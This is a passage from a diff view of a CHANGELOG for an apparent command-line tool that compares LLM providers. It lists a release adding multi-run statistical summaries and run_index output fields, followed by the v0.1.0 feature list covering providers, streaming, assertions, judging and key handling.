911
|
+
- `compare` command's display path branches when `runs > 1` to show statistical summary instead of per-run details. When `runs == 1` (default), behavior is byte-identical to v0.1.0.
|
|
912
|
+
- `run_streaming_comparison()` accepts new keyword parameters `runs: int = 1` and `show_all_runs: bool = False`. Default values preserve existing behavior.
|
|
913
|
+
- `StreamState` dataclass has new field `run_index: int = 0`. Default value preserves all existing test expectations.
|
|
914
|
+
- `BatchResult` dataclass has new field `run_index: int = 0`. Only emitted in CSV/JSON/Markdown output when the surrounding `runs` parameter > 1.
|
|
915
|
+
- Live streaming display auto-collapses when total concurrent tasks exceed 12 (configurable via `--show-all-runs`).
|
|
916
|
+
- LLM-as-judge with `--runs N`:
|
|
917
|
+
- Default (with `--judge` or `--judges`): mode-only judging (one judge call per cell, expanded to every run in the cell)
|
|
918
|
+
- With `--check-hallucination`: per-run judging (computes hallucination rate)
|
|
919
|
+
- JSON output schema additive when `runs > 1`: new `total_runs` and `stats_by_cell` top-level fields, plus `run_index` per result. When `runs == 1`, schema is byte-identical to v0.1.0.
|
|
920
|
+
- CSV output adds `run_index` column when `runs > 1`. When `runs == 1`, columns are unchanged.
|
|
921
|
+
- Markdown output adds a "Per-cell statistical summary" section when `runs > 1`. When `runs == 1`, output is unchanged.
|
|
922
|
+
|
|
923
|
+
### Fixed
|
|
924
|
+
|
|
925
|
+
- N/A (no bug fixes in this release; only additions)
|
|
926
|
+
|
|
927
|
+
## [0.1.0] - 2026-05-25
|
|
928
|
+
|
|
929
|
+
### Added
|
|
930
|
+
|
|
931
|
+
- Initial v0.1.0 release
|
|
932
|
+
- 8 cloud provider integrations: OpenAI, Anthropic, Google, xAI, DeepSeek, Mistral, Groq, OpenRouter
|
|
933
|
+
- Local model support: Ollama, LM Studio, vLLM, llama.cpp via OpenAI-compatible API
|
|
934
|
+
- Parallel streaming with TTFT (Time To First Token) tracking
|
|
935
|
+
- Multi-prompt batch mode with CSV, JSON, and Markdown output formats
|
|
936
|
+
- System prompt support: single, multiple (comparison), and file-based
|
|
937
|
+
- LLM-as-a-judge scoring with panel mode and self-evaluation skip
|
|
938
|
+
- Deterministic assertions with 10 types (`contains`, `not_contains`, `regex`, `equals`, `json_valid`, `json_schema`, `min_length_chars`, `max_length_chars`, `latency_under`, `cost_under`)
|
|
939
|
+
- CI/CD exit codes: 0 = success, 1 = assertion failure, 2 = call failure (call failures dominate)
|
|
940
|
+
- Hallucination detection preset with optional reference facts and worst-wins panel aggregation
|
|
941
|
+
- OS-native keychain integration via `keyring`
|
|
942
|
+
- API key format validation for 8 providers
|
|
943
|
+
- Error message redaction prevents key leakage
|
|
944
|
+
- Localhost-only validation for local model URLs
|
|
945
|
+
- Cross-platform support: macOS, Windows 10+/ARM, Linux
|
|
946
|
+
- Rate limit handling: 429 retry with exponential backoff, 529 (Anthropic overloaded) with longer backoff
|
|
947
|
+
- `retry-after` header honored when present
|
|
948
|
+
- Per-provider semaphores for concurrent request management
|
|
949
|
+
- Atomic file writes for output integrity
|
|
950
|
+
- Apache 2.0 License with proper NOTICE attribution
|